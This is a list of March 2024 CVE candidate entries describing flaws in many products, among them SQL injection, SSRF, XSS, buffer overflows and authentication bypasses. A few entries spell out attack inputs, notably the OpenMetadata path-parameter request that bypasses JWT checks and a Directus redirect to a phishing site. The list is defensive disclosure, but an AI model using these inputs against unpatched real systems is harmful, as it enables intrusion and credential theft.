CVE 2024 28338 Candidate A login bypass in TOTOLINK A8000RU V7.1cu.643_B20200521 allows attackers to login to Administrator accounts via providing a crafted session cookie. MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A8000RU/TOTOlink%20A8000RU%20login%20bypass.md Assigned (20240308)
CVE 2024 28323 Candidate The bwdates-report-result.php file in Phpgurukul User Registration & Login and User Management System 3.1 contains a potential security vulnerability related to user input validation. The script retrieves user-provided date inputs without proper validation, making it susceptible to SQL injection attacks. MISC:https://packetstormsecurity.com/files/177168/User-Registration-And-Login-And-User-Management-System-3.1-SQL-Injection.html Assigned (20240308)
CVE 2024 2832 Candidate A vulnerability classified as problematic was found in Campcodes Online Shopping System 1.0. This vulnerability affects unknown code of the file /offersmail.php. The manipulation of the argument email leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257752. MISC:VDB-257752 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257752 | MISC:VDB-257752 | Campcodes Online Shopping System offersmail.php cross site scripting | URL:https://vuldb.com/?id.257752 | MISC:https://github.com/comeony/vuln_report/blob/main/Online%20Shopping%20System%20-%20vuln%201.pdf | URL:https://github.com/comeony/vuln_report/blob/main/Online%20Shopping%20System%20-%20vuln%201.pdf Assigned (20240322)
CVE 2024 28319 Candidate gpac 2.3-DEV-rev921-g422b78ecf-master was discovered to contain an out of boundary read vulnerability via gf_dash_setup_period media_tools/dash_client.c:6374 MISC:https://github.com/gpac/gpac/issues/2763 Assigned (20240308)
CVE 2024 28318 Candidate gpac 2.3-DEV-rev921-g422b78ecf-master was discovered to contain a out of boundary write vulnerability via swf_get_string at scene_manager/swf_parse.c:325 MISC:https://github.com/gpac/gpac/issues/2764 Assigned (20240308)
CVE 2024 28303 Candidate Open Source Medicine Ordering System v1.0 was discovered to contain a SQL injection vulnerability via the date parameter at /admin/reports/index.php. MISC:https://github.com/onurkarasalihoglu/vulnerability-disclosures/blob/main/omos-sql-injection.md | MISC:https://github.com/onurkarasalihoglu/vulnerability-disclosures/blob/main/omos_sqli_exploit.py Assigned (20240308)
CVE 2024 28286 Candidate In mz-automation libiec61850 v1.4.0, a NULL Pointer Dereference was detected in the mmsServer_handleFileCloseRequest.c function of src/mms/iso_mms/server/mms_file_service.c. The vulnerability manifests as SEGV and causes the application to crash MISC:https://github.com/mz-automation/libiec61850/issues/496 Assigned (20240308)
CVE 2024 28283 Candidate There is stack-based buffer overflow vulnerability in pc_change_act function in Linksys E1000 router firmware version v.2.1.03 and before, leading to remote code execution. MISC:https://d05004.notion.site/Linksys-E1000-BOF-37b98eec45ea4fc991b9b5bea3db091d?pvs=4 Assigned (20240308)
CVE 2024 2828 Candidate A vulnerability, which was classified as critical, was found in lakernote EasyAdmin up to 20240315. Affected is the function thumbnail of the file src/main/java/com/laker/admin/module/sys/controller/IndexController.java. The manipulation of the argument url leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The patch is identified as 23165d8cb569048c531150f194fea39f8800b8d5. It is recommended to apply a patch to fix this issue. VDB-257718 is the identifier assigned to this vulnerability. MISC:VDB-257718 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257718 | MISC:VDB-257718 | lakernote EasyAdmin IndexController.java thumbnail server-side request forgery | URL:https://vuldb.com/?id.257718 | MISC:https://gitee.com/lakernote/easy-admin/commit/23165d8cb569048c531150f194fea39f8800b8d5 | URL:https://gitee.com/lakernote/easy-admin/commit/23165d8cb569048c531150f194fea39f8800b8d5 | MISC:https://gitee.com/lakernote/easy-admin/issues/I98YSR | URL:https://gitee.com/lakernote/easy-admin/issues/I98YSR Assigned (20240322)
CVE 2024 2827 Candidate A vulnerability, which was classified as critical, has been found in lakernote EasyAdmin up to 20240315. This issue affects some unknown processing of the file /ureport/designer/saveReportFile. The manipulation leads to server-side request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257717 was assigned to this vulnerability. MISC:VDB-257717 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257717 | MISC:VDB-257717 | lakernote EasyAdmin saveReportFile server-side request forgery | URL:https://vuldb.com/?id.257717 | MISC:https://gitee.com/lakernote/easy-admin/issues/I98ZTA | URL:https://gitee.com/lakernote/easy-admin/issues/I98ZTA Assigned (20240322)
CVE 2024 2826 Candidate A vulnerability classified as problematic was found in lakernote EasyAdmin up to 20240315. This vulnerability affects unknown code of the file /ureport/designer/saveReportFile. The manipulation leads to xml external entity reference. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257716. MISC:VDB-257716 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257716 | MISC:VDB-257716 | lakernote EasyAdmin saveReportFile xml external entity reference | URL:https://vuldb.com/?id.257716 | MISC:https://gitee.com/lakernote/easy-admin/issues/I98ZTA | URL:https://gitee.com/lakernote/easy-admin/issues/I98ZTA Assigned (20240322)
CVE 2024 28255 Candidate OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `JwtFilter` handles the API authentication by requiring and verifying JWT tokens. When a new request comes in, the request's path is checked against this list. When the request's path contains any of the excluded endpoints the filter returns without validating the JWT. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings. For example, a request to `GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/111` will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint, including the ones listed above that lead to arbitrary SpEL expression injection. This bypass will not work when the endpoint uses the `SecurityContext.getUserPrincipal()` since it will return `null` and will throw an NPE. This issue may lead to authentication bypass and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-237`. MISC:https://github.com/open-metadata/OpenMetadata/blob/e2043a3f31312ebb42391d6c93a67584d798de52/openmetadata-service/src/main/java/org/openmetadata/service/security/JwtFilter.java#L111 | URL:https://github.com/open-metadata/OpenMetadata/blob/e2043a3f31312ebb42391d6c93a67584d798de52/openmetadata-service/src/main/java/org/openmetadata/service/security/JwtFilter.java#L111 | MISC:https://github.com/open-metadata/OpenMetadata/blob/e2043a3f31312ebb42391d6c93a67584d798de52/openmetadata-service/src/main/java/org/openmetadata/service/security/JwtFilter.java#L113 | URL:https://github.com/open-metadata/OpenMetadata/blob/e2043a3f31312ebb42391d6c93a67584d798de52/openmetadata-service/src/main/java/org/openmetadata/service/security/JwtFilter.java#L113 | MISC:https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-6wx7-qw5p-wh84 | URL:https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-6wx7-qw5p-wh84 Assigned (20240307)
CVE 2024 28254 Candidate OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `AlertUtil::validateExpression` method evaluates an SpEL expression using `getValue` which by default uses the `StandardEvaluationContext`, allowing the expression to reach and interact with Java classes such as `java.lang.Runtime`, leading to Remote Code Execution. The `/api/v1/events/subscriptions/validation/condition/<expression>` endpoint passes user-controlled data `AlertUtil::validateExpession` allowing authenticated (non-admin) users to execute arbitrary system commands on the underlaying operating system. In addition, there is a missing authorization check since `Authorizer.authorize()` is never called in the affected path and, therefore, any authenticated non-admin user is able to trigger this endpoint and evaluate arbitrary SpEL expressions leading to arbitrary command execution. This vulnerability was discovered with the help of CodeQL's Expression language injection (Spring) query and is also tracked as `GHSL-2023-235`. This issue may lead to Remote Code Execution and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection | URL:https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection | MISC:https://github.com/open-metadata/OpenMetadata/blob/84054a85d3478e3e3795fe92daa633ec11c9d6d9/openmetadata-service/src/main/java/org/openmetadata/service/events/subscription/AlertUtil.java#L101 | URL:https://github.com/open-metadata/OpenMetadata/blob/84054a85d3478e3e3795fe92daa633ec11c9d6d9/openmetadata-service/src/main/java/org/openmetadata/service/events/subscription/AlertUtil.java#L101 | MISC:https://github.com/open-metadata/OpenMetadata/blob/84054a85d3478e3e3795fe92daa633ec11c9d6d9/openmetadata-service/src/main/java/org/openmetadata/service/events/subscription/AlertUtil.java#L108 | URL:https://github.com/open-metadata/OpenMetadata/blob/84054a85d3478e3e3795fe92daa633ec11c9d6d9/openmetadata-service/src/main/java/org/openmetadata/service/events/subscription/AlertUtil.java#L108 | MISC:https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-j86m-rrpr-g8gw | URL:https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-j86m-rrpr-g8gw | MISC:https://github.com/spring-projects/spring-framework/blob/4e2d3573189b7c0afce62bce29cd915de4077f56/spring-expression/src/main/java/org/springframework/expression/spel/standard/SpelExpression.java#L106 | URL:https://github.com/spring-projects/spring-framework/blob/4e2d3573189b7c0afce62bce29cd915de4077f56/spring-expression/src/main/java/org/springframework/expression/spel/standard/SpelExpression.java#L106 Assigned (20240307)
CVE 2024 28253 Candidate OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. `CompiledRule::validateExpression` is also called from `PolicyRepository.prepare`. `prepare()` is called from `EntityRepository.prepareInternal()` which, in turn, gets called from `EntityResource.createOrUpdate()`. Note that even though there is an authorization check (`authorizer.authorize()`), it gets called after `prepareInternal()` gets called and therefore after the SpEL expression has been evaluated. In order to reach this method, an attacker can send a PUT request to `/api/v1/policies` which gets handled by `PolicyResource.createOrUpdate()`. This vulnerability was discovered with the help of CodeQL's Expression language injection (Spring) query and is also tracked as `GHSL-2023-252`. This issue may lead to Remote Code Execution and has been addressed in version 1.3.1. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection | URL:https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection | MISC:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EntityRepository.java#L693 | URL:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EntityRepository.java#L693 | MISC:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/EntityResource.java#L219 | URL:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/EntityResource.java#L219 | MISC:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/policies/PolicyResource.java#L365 | URL:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/policies/PolicyResource.java#L365 | MISC:https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/PolicyRepository.java#L113 | URL:https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/PolicyRepository.java#L113 | MISC:https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-7vf4-x5m2-r6gr | URL:https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-7vf4-x5m2-r6gr Assigned (20240307)
CVE 2024 28252 Candidate CoreWCF is a port of the service side of Windows Communication Foundation (WCF) to .NET Core. If you have a NetFraming based CoreWCF service, extra system resources could be consumed by connections being left established instead of closing or aborting them. There are two scenarios when this can happen. When a client established a connection to the service and sends no data, the service will wait indefinitely for the client to initiate the NetFraming session handshake. Additionally, once a client has established a session, if the client doesn't send any requests for the period of time configured in the binding ReceiveTimeout, the connection is not properly closed as part of the session being aborted. The bindings affected by this behavior are NetTcpBinding, NetNamedPipeBinding, and UnixDomainSocketBinding. Only NetTcpBinding has the ability to accept non local connections. The currently supported versions of CoreWCF are v1.4.x and v1.5.x. The fix can be found in v1.4.2 and v1.5.2 of the CoreWCF packages. Users are advised to upgrade. There are no workarounds for this issue. MISC:https://github.com/CoreWCF/CoreWCF/issues/1345 | URL:https://github.com/CoreWCF/CoreWCF/issues/1345 | MISC:https://github.com/CoreWCF/CoreWCF/security/advisories/GHSA-32jq-mv89-5rx7 | URL:https://github.com/CoreWCF/CoreWCF/security/advisories/GHSA-32jq-mv89-5rx7 Assigned (20240307)
CVE 2024 28251 Candidate Querybook is a Big Data Querying UI, combining collocated table metadata and a simple notebook interface. Querybook's datadocs functionality works by using a Websocket Server. The client talks to this WSS whenever updating/deleting/reading any cells as well as for watching the live status of query executions. Currently the CORS setting allows all origins, which could result in cross-site websocket hijacking and allow attackers to read/edit/remove datadocs of the user. This issue has been addressed in version 3.32.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/pinterest/querybook/pull/1425 | URL:https://github.com/pinterest/querybook/pull/1425 | MISC:https://github.com/pinterest/querybook/security/advisories/GHSA-5349-j4c9-x767 | URL:https://github.com/pinterest/querybook/security/advisories/GHSA-5349-j4c9-x767 Assigned (20240307)
CVE 2024 28250 Candidate Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Starting in version 1.14.0 and prior to versions 1.14.8 and 1.15.2, In Cilium clusters with WireGuard enabled and traffic matching Layer 7 policies Wireguard-eligible traffic that is sent between a node's Envoy proxy and pods on other nodes is sent unencrypted and Wireguard-eligible traffic that is sent between a node's DNS proxy and pods on other nodes is sent unencrypted. This issue has been resolved in Cilium 1.14.8 and 1.15.2 in in native routing mode (`routingMode=native`) and in Cilium 1.14.4 in tunneling mode (`routingMode=tunnel`). Not that in tunneling mode, `encryption.wireguard.encapsulate` must be set to `true`. There is no known workaround for this issue. MISC:https://github.com/cilium/cilium/releases/tag/v1.13.13 | URL:https://github.com/cilium/cilium/releases/tag/v1.13.13 | MISC:https://github.com/cilium/cilium/releases/tag/v1.14.8 | URL:https://github.com/cilium/cilium/releases/tag/v1.14.8 | MISC:https://github.com/cilium/cilium/releases/tag/v1.15.2 | URL:https://github.com/cilium/cilium/releases/tag/v1.15.2 | MISC:https://github.com/cilium/cilium/security/advisories/GHSA-v6q2-4qr3-5cw6 | URL:https://github.com/cilium/cilium/security/advisories/GHSA-v6q2-4qr3-5cw6 Assigned (20240307)
CVE 2024 2825 Candidate A vulnerability classified as critical has been found in lakernote EasyAdmin up to 20240315. This affects an unknown part of the file /ureport/designer/saveReportFile. The manipulation of the argument file leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257715. MISC:VDB-257715 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257715 | MISC:VDB-257715 | lakernote EasyAdmin saveReportFile path traversal | URL:https://vuldb.com/?id.257715 | MISC:https://gitee.com/lakernote/easy-admin/issues/I98ZTA | URL:https://gitee.com/lakernote/easy-admin/issues/I98ZTA Assigned (20240322)
CVE 2024 28249 Candidate Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Prior to versions 1.13.13, 1.14.8, and 1.15.2, in Cilium clusters with IPsec enabled and traffic matching Layer 7 policies, IPsec-eligible traffic between a node's Envoy proxy and pods on other nodes is sent unencrypted and IPsec-eligible traffic between a node's DNS proxy and pods on other nodes is sent unencrypted. This issue has been resolved in Cilium 1.15.2, 1.14.8, and 1.13.13. There is no known workaround for this issue. MISC:https://github.com/cilium/cilium/releases/tag/v1.13.13 | URL:https://github.com/cilium/cilium/releases/tag/v1.13.13 | MISC:https://github.com/cilium/cilium/releases/tag/v1.14.8 | URL:https://github.com/cilium/cilium/releases/tag/v1.14.8 | MISC:https://github.com/cilium/cilium/releases/tag/v1.15.2 | URL:https://github.com/cilium/cilium/releases/tag/v1.15.2 | MISC:https://github.com/cilium/cilium/security/advisories/GHSA-j89h-qrvr-xc36 | URL:https://github.com/cilium/cilium/security/advisories/GHSA-j89h-qrvr-xc36 Assigned (20240307)
CVE 2024 28248 Candidate Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Starting in version 1.13.9 and prior to versions 1.13.13, 1.14.8, and 1.15.2, Cilium's HTTP policies are not consistently applied to all traffic in the scope of the policies, leading to HTTP traffic being incorrectly and intermittently forwarded when it should be dropped. This issue has been patched in Cilium 1.15.2, 1.14.8, and 1.13.13. There are no known workarounds for this issue. MISC:https://docs.cilium.io/en/stable/security/policy/language/#http | URL:https://docs.cilium.io/en/stable/security/policy/language/#http | MISC:https://github.com/cilium/cilium/releases/tag/v1.13.13 | URL:https://github.com/cilium/cilium/releases/tag/v1.13.13 | MISC:https://github.com/cilium/cilium/releases/tag/v1.14.8 | URL:https://github.com/cilium/cilium/releases/tag/v1.14.8 | MISC:https://github.com/cilium/cilium/releases/tag/v1.15.2 | URL:https://github.com/cilium/cilium/releases/tag/v1.15.2 | MISC:https://github.com/cilium/cilium/security/advisories/GHSA-68mj-9pjq-mc85 | URL:https://github.com/cilium/cilium/security/advisories/GHSA-68mj-9pjq-mc85 Assigned (20240307)
CVE 2024 28246 Candidate KaTeX is a JavaScript library for TeX math rendering on the web. Code that uses KaTeX's `trust` option, specifically that provides a function to blacklist certain URL protocols, can be fooled by URLs in malicious inputs that use uppercase characters in the protocol. In particular, this can allow for malicious input to generate `javascript:` links in the output, even if the `trust` function tries to forbid this protocol via `trust: (context) => context.protocol !== 'javascript'`. Upgrade to KaTeX v0.16.10 to remove this vulnerability. MISC:https://github.com/KaTeX/KaTeX/commit/fc5af64183a3ceb9be9d1c23a275999a728593de | URL:https://github.com/KaTeX/KaTeX/commit/fc5af64183a3ceb9be9d1c23a275999a728593de | MISC:https://github.com/KaTeX/KaTeX/security/advisories/GHSA-3wc5-fcw2-2329 | URL:https://github.com/KaTeX/KaTeX/security/advisories/GHSA-3wc5-fcw2-2329 Assigned (20240307)
CVE 2024 28245 Candidate KaTeX is a JavaScript library for TeX math rendering on the web. KaTeX users who render untrusted mathematical expressions could encounter malicious input using `\includegraphics` that runs arbitrary JavaScript, or generate invalid HTML. Upgrade to KaTeX v0.16.10 to remove this vulnerability. MISC:https://github.com/KaTeX/KaTeX/commit/c5897fcd1f73da9612a53e6b5544f1d776e17770 | URL:https://github.com/KaTeX/KaTeX/commit/c5897fcd1f73da9612a53e6b5544f1d776e17770 | MISC:https://github.com/KaTeX/KaTeX/security/advisories/GHSA-f98w-7cxr-ff2h | URL:https://github.com/KaTeX/KaTeX/security/advisories/GHSA-f98w-7cxr-ff2h Assigned (20240307)
CVE 2024 28244 Candidate KaTeX is a JavaScript library for TeX math rendering on the web. KaTeX users who render untrusted mathematical expressions could encounter malicious input using `\def` or `\newcommand` that causes a near-infinite loop, despite setting `maxExpand` to avoid such loops. KaTeX supports an option named maxExpand which aims to prevent infinitely recursive macros from consuming all available memory and/or triggering a stack overflow error. Unfortunately, support for "Unicode (sub|super)script characters" allows an attacker to bypass this limit. Each sub/superscript group instantiated a separate Parser with its own limit on macro executions, without inheriting the current count of macro executions from its parent. This has been corrected in KaTeX v0.16.10. MISC:https://github.com/KaTeX/KaTeX/commit/085e21b5da05414efefa932570e7201a7c70e5b2 | URL:https://github.com/KaTeX/KaTeX/commit/085e21b5da05414efefa932570e7201a7c70e5b2 | MISC:https://github.com/KaTeX/KaTeX/security/advisories/GHSA-cvr6-37gx-v8wc | URL:https://github.com/KaTeX/KaTeX/security/advisories/GHSA-cvr6-37gx-v8wc Assigned (20240307)
CVE 2024 28243 Candidate KaTeX is a JavaScript library for TeX math rendering on the web. KaTeX users who render untrusted mathematical expressions could encounter malicious input using `\edef` that causes a near-infinite loop, despite setting `maxExpand` to avoid such loops. This can be used as an availability attack, where e.g. a client rendering another user's KaTeX input will be unable to use the site due to memory overflow, tying up the main thread, or stack overflow. Upgrade to KaTeX v0.16.10 to remove this vulnerability. MISC:https://github.com/KaTeX/KaTeX/commit/e88b4c357f978b1bca8edfe3297f0aa309bcbe34 | URL:https://github.com/KaTeX/KaTeX/commit/e88b4c357f978b1bca8edfe3297f0aa309bcbe34 | MISC:https://github.com/KaTeX/KaTeX/security/advisories/GHSA-64fm-8hw2-v72w | URL:https://github.com/KaTeX/KaTeX/security/advisories/GHSA-64fm-8hw2-v72w Assigned (20240307)
CVE 2024 28242 Candidate Discourse is an open source platform for community discussion. In affected versions an attacker can learn that secret categories exist when they have backgrounds set. The issue is patched in the latest stable, beta and tests-passed version of Discourse. Users are advised to upgrade. Users unable to upgrade should temporarily remove category backgrounds. MISC:https://github.com/discourse/discourse/commit/b425fbc2a28341a5627928f963519006712c3d39 | URL:https://github.com/discourse/discourse/commit/b425fbc2a28341a5627928f963519006712c3d39 | MISC:https://github.com/discourse/discourse/security/advisories/GHSA-c7q7-7f6q-2c23 | URL:https://github.com/discourse/discourse/security/advisories/GHSA-c7q7-7f6q-2c23 Assigned (20240307)
CVE 2024 2824 Candidate A vulnerability was found in Matthias-Wandel jhead 3.08 and classified as critical. This issue affects the function PrintFormatNumber of the file exif.c. The manipulation leads to heap-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257711. MISC:VDB-257711 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257711 | MISC:VDB-257711 | Matthias-Wandel jhead exif.c PrintFormatNumber heap-based overflow | URL:https://vuldb.com/?id.257711 | MISC:https://github.com/Matthias-Wandel/jhead/files/14613084/poc.zip | URL:https://github.com/Matthias-Wandel/jhead/files/14613084/poc.zip | MISC:https://github.com/Matthias-Wandel/jhead/issues/84 | URL:https://github.com/Matthias-Wandel/jhead/issues/84 Assigned (20240322)
CVE 2024 28239 Candidate Directus is a real-time API and App dashboard for managing SQL database content. The authentication API has a `redirect` parameter that can be exploited as an open redirect vulnerability as the user tries to log in via the API URL. There's a redirect that is done after successful login via the Auth API GET request to `directus/auth/login/google?redirect=http://malicious-fishing-site.com`. While credentials don't seem to be passed to the attacker site, the user can be phished into clicking a legitimate directus site and be taken to a malicious site made to look like a an error message "Your password needs to be updated" to phish out the current password. Users who login via OAuth2 into Directus may be at risk. This issue has been addressed in version 10.10.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://docs.directus.io/reference/authentication.html#login-using-sso-providers | URL:https://docs.directus.io/reference/authentication.html#login-using-sso-providers | MISC:https://github.com/directus/directus/commit/5477d7d61babd7ffc2f835d399bf79611b15b203 | URL:https://github.com/directus/directus/commit/5477d7d61babd7ffc2f835d399bf79611b15b203 | MISC:https://github.com/directus/directus/security/advisories/GHSA-fr3w-2p22-6w7p | URL:https://github.com/directus/directus/security/advisories/GHSA-fr3w-2p22-6w7p Assigned (20240307)
CVE 2024 28238 Candidate Directus is a real-time API and App dashboard for managing SQL database content. When reaching the /files page, a JWT is passed via GET request. Inclusion of session tokens in URLs poses a security risk as URLs are often logged in various places (e.g., web server logs, browser history). Attackers gaining access to these logs may hijack active user sessions, leading to unauthorized access to sensitive information or actions on behalf of the user. This issue has been addressed in version 10.10.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/directus/directus/security/advisories/GHSA-2ccr-g2rv-h677 | URL:https://github.com/directus/directus/security/advisories/GHSA-2ccr-g2rv-h677 Assigned (20240307)
CVE 2024 28237 Candidate OctoPrint provides a web interface for controlling consumer 3D printers. OctoPrint versions up until and including 1.9.3 contain a vulnerability that allows malicious admins to configure or talk a victim with administrator rights into configuring a webcam snapshot URL which when tested through the "Test" button included in the web interface will execute JavaScript code in the victims browser when attempting to render the snapshot image. An attacker who successfully talked a victim with admin rights into performing a snapshot test with such a crafted URL could use this to retrieve or modify sensitive configuration settings, interrupt prints or otherwise interact with the OctoPrint instance in a malicious way. The vulnerability is patched in version 1.10.0rc3. OctoPrint administrators are strongly advised to thoroughly vet who has admin access to their installation and what settings they modify based on instructions by strangers. MISC:https://github.com/OctoPrint/OctoPrint/commit/779894c1bc6478332d14bc9ed1006df1354eb517 | URL:https://github.com/OctoPrint/OctoPrint/commit/779894c1bc6478332d14bc9ed1006df1354eb517 | MISC:https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-x7mf-wrh9-r76c | URL:https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-x7mf-wrh9-r76c Assigned (20240307)
CVE 2024 28236 Candidate Vela is a Pipeline Automation (CI/CD) framework built on Linux container technology written in Golang. Vela pipelines can use variable substitution combined with insensitive fields like `parameters`, `image` and `entrypoint` to inject secrets into a plugin/image and — by using common substitution string manipulation — can bypass log masking and expose secrets without the use of the commands block. This unexpected behavior primarily impacts secrets restricted by the "no commands" option. This can lead to unintended use of the secret value, and increased risk of exposing the secret during image execution bypassing log masking. **To exploit this** the pipeline author must be supplying the secrets to a plugin that is designed in such a way that will print those parameters in logs. Plugin parameters are not designed for sensitive values and are often intentionally printed throughout execution for informational/debugging purposes. Parameters should therefore be treated as insensitive. While Vela provides secrets masking, secrets exposure is not entirely solved by the masking process. A docker image (plugin) can easily expose secrets if they are not handled properly, or altered in some way. There is a responsibility on the end-user to understand how values injected into a plugin are used. This is a risk that exists for many CICD systems (like GitHub Actions) that handle sensitive runtime variables. Rather, the greater risk is that users who restrict a secret to the "no commands" option and use image restriction can still have their secret value exposed via substitution tinkering, which turns the image and command restrictions into a false sense of security. This issue has been addressed in version 0.23.2. Users are advised to upgrade. Users unable to upgrade should not provide sensitive values to plugins that can potentially expose them, especially in `parameters` that are not intended to be used for sensitive values, ensure plugins (especially those that utilize shared secrets) follow best practices to avoid logging parameters that are expected to be sensitive, minimize secrets with `pull_request` events enabled, as this allows users to change pipeline configurations and pull in secrets to steps not typically part of the CI process, make use of the build approval setting, restricting builds from untrusted users, and limit use of shared secrets, as they are less restrictive to access by nature. MISC:https://github.com/go-vela/worker/commit/e1572743b008e4fbce31ebb1dcd23bf6a1a30297 | URL:https://github.com/go-vela/worker/commit/e1572743b008e4fbce31ebb1dcd23bf6a1a30297 | MISC:https://github.com/go-vela/worker/security/advisories/GHSA-pwx5-6wxg-px5h | URL:https://github.com/go-vela/worker/security/advisories/GHSA-pwx5-6wxg-px5h Assigned (20240307)
CVE 2024 28231 Candidate eprosima Fast DDS is a C++ implementation of the Data Distribution Service standard of the Object Management Group. Prior to versions 2.14.0, 2.13.4, 2.12.3, 2.10.4, and 2.6.8, manipulated DATA Submessage can cause a heap overflow error in the Fast-DDS process, causing the process to be terminated remotely. Additionally, the payload_size in the DATA Submessage packet is declared as uint32_t. When a negative number, such as -1, is input into this variable, it results in an Integer Overflow (for example, -1 gets converted to 0xFFFFFFFF). This eventually leads to a heap-buffer-overflow, causing the program to terminate. Versions 2.14.0, 2.13.4, 2.12.3, 2.10.4, and 2.6.8 contain a fix for this issue. MISC:https://github.com/eProsima/Fast-DDS/commit/355706386f4af9ce74125eeec3c449b06113112b | URL:https://github.com/eProsima/Fast-DDS/commit/355706386f4af9ce74125eeec3c449b06113112b | MISC:https://github.com/eProsima/Fast-DDS/security/advisories/GHSA-9m2j-qw67-ph4w | URL:https://github.com/eProsima/Fast-DDS/security/advisories/GHSA-9m2j-qw67-ph4w Assigned (20240307)
CVE 2024 28230 Candidate In JetBrains YouTrack before 2024.1.25893 attaching/detaching workflow to a project was possible without project admin permissions MISC:https://www.jetbrains.com/privacy-security/issues-fixed/ | URL:https://www.jetbrains.com/privacy-security/issues-fixed/ Assigned (20240307)
CVE 2024 2823 Candidate A vulnerability has been found in DedeCMS 5.7 and classified as problematic. This vulnerability affects unknown code of the file /src/dede/mda_main.php. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257710 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257710 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257710 | MISC:VDB-257710 | DedeCMS mda_main.php cross-site request forgery | URL:https://vuldb.com/?id.257710 | MISC:https://github.com/lcg-22266/cms/blob/main/1.md | URL:https://github.com/lcg-22266/cms/blob/main/1.md Assigned (20240322)
CVE 2024 28229 Candidate In JetBrains YouTrack before 2024.1.25893 user without appropriate permissions could restore issues and articles MISC:https://www.jetbrains.com/privacy-security/issues-fixed/ | URL:https://www.jetbrains.com/privacy-security/issues-fixed/ Assigned (20240307)
CVE 2024 28228 Candidate In JetBrains YouTrack before 2024.1.25893 creation comments on behalf of an arbitrary user in HelpDesk was possible MISC:https://www.jetbrains.com/privacy-security/issues-fixed/ | URL:https://www.jetbrains.com/privacy-security/issues-fixed/ Assigned (20240307)
CVE 2024 28222 Candidate In Veritas NetBackup before 8.1.2 and NetBackup Appliance before 3.1.2, the BPCD process inadequately validates the file path, allowing an unauthenticated attacker to upload and execute a custom file. MISC:https://www.veritas.com/content/support/en_US/security/VTS23-010 Assigned (20240307)
